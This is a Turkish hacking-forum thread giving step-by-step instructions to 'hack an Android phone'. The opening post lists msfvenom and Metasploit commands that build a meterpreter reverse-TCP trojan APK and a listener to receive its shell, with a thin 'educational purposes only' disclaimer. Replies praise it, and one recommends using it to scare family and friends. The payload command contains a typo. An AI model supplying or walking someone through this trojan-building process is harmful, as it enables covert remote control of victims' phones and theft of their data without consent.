Android telefon nasıl hacklenir

BlackPion

Üye
21 Haz 2021
154
37
18
Merhaba sayın THT üyeleri bu konuda sizlere andriod telefon nasıl hacklenir size onu göstereceğim

(İlk konum olduğu için hatalarım olabilir lütfen kusura bakmayın)

ilk önce kali linux'umuzu açalım "root olmaya dikkat edelim" size vereceğim komutu terminalinize yazın

kod : msfvenom -p android/meterpreter/reverse_tcp LHOST=(buraya Kendi ipniz) LPORT=4163 R > /root/Desktop/THTdeneme.apk

THTdeneme ismini istediğiniz gibi ayarlayabilirsiniz fakat apk yı ellemeyin android'e hazırladığımız için apk olmak zorunda

daha sonra ise bir terminal daha açın ve msfconsole yazın ve bekleyin (sizde resim farklı olabilir)

kod : msfconsole

kod : use exploit/multi/handler

ve daha sonra set payload/materpreter/reverse_tcp yazıyoruz

kod : set payload/materpreter/reverse_tcp

ve ardından show options yazıyoruz

kod : show options

ve LHOST un boş olduğunu görüyoruz bu demekki trojanı ip adresiniz dinleyemez

kod :set LHOST (Kendi ip adresiniz

kod :set LPORT 4163

ve tekrardan show options yazıyoruz

kod : show options

Resim : (Port ve Lhost ile aynı)

ve son olarak exploit diyetrek trojanımızı tam anlamı ile oluşturuyoruz

Not : Tamamen eğitim amaçlı'dır yapılan eğlemerden kişi sorumludur.

Not2 : bunu sadece kendi ağınız üzerinden yapabilirsiniz

Helmsys

Ar-Ge Ekibi Kıdemli
16 Mar 2022
1,492
25
1,653
Adım adım anlatman çok hoş eline sağlık. Burada araştırman ve kendi bilgilerinden de yanıtlar olduğunu düşünüyorum. Güzel bir tavsiye vermek istiyorum resimleri paylaşırken özellikle hızlıresim aracılığı ile paylaşma kısmında resmin bbcode formatında paylaşman konuya ilgi duyup anlamaya çalışan insanlara daha da faydası olur diye düşünüyorum. Çünkü resme tıklayıp başka bir pencereye gitmek konu bütünlüğünü bozduğundan "Nerede kalmıştım"a bağlanabilir.

BlackPion

Üye
21 Haz 2021
154
37
18
Adım adım anlatman çok hoş eline sağlık. Burada araştırman ve kendi bilgilerinden de yanıtlar olduğunu düşünüyorum. Güzel bir tavsiye vermek istiyorum resimleri paylaşırken özellikle hızlıresim aracılığı ile paylaşma kısmında resmin bbcode formatında paylaşman konuya ilgi duyup anlamaya çalışan insanlara daha da faydası olur diye düşünüyorum. Çünkü resme tıklayıp başka bir pencereye gitmek konu bütünlüğünü bozduğundan "Nerede kalmıştım"a bağlanabilir.
tavsiyen için teşekkür ederim hocam :)

w1sd0m

Katılımcı Üye
28 Mar 2020
699
6
631
𐱃𐰀𐰢𐰴
Eline sağlık, konu açma konusunda hevesli olman güzel.
Yapıcı eleştiri olarak şunu söyleyebilirim; resimleri düzenlemen gerekiyor, yazıları renklendirirsen okuyucunun ilgisini çekecektir.

BlackPion

Üye
21 Haz 2021
154
37
18
Eline sağlık, konu açma konusunda hevesli olman güzel.
Yapıcı eleştiri olarak şunu söyleyebilirim; resimleri düzenlemen gerekiyor, yazıları renklendirirsen okuyucunun ilgisini çekecektir.
biliyorum hocam eksiklerim var bunu düzeltmeye çalışacağım teşekkğr ederim :)

Loux

Uzman üye
16 Ocak 2019
1,753
18
1,085
BL4CKGORE
Selamlar,

Bu işlem ile sadece aynı ağda olan bir android cihazı hacklersiniz. Dış ağa işlem yapmak için port açmanız ve statik ip ye ihtiyacınız vardır.

hack6m

Üye
20 Mar 2022
176
57
Everywhere
Güzel bir konu olmuş. İşe yarar, aile içinde veya arkadaşlar arasında eğlenmek, korkutmak vb. için. Elinize sağlık.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.